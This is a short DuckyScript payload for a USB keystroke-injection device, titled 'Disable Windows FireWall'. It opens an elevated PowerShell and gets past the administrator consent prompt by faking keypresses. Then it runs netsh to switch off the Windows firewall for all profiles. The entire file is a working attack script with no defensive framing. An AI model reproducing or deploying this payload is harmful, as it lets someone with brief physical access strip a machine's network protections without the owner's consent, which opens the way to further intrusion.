REM ###########################################################
REM #                                                         |
REM # Title        : Disable Windows FireWall                 |
REM # Author       : Zenin                                    |
REM # Version      : 1.0                                      |
REM # Category     : Execution                                |
REM # Target       : Windows                                  |
REM #                                                         |
REM ###########################################################
DELAY 750
WINDOWS d
DELAY 850
WINDOWS r
DELAY 900
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 750
LEFTARROW
ENTER
DELAY 900
ALT y
DELAY 900
STRING netsh advfirewall set allprofiles state off; exit
ENTER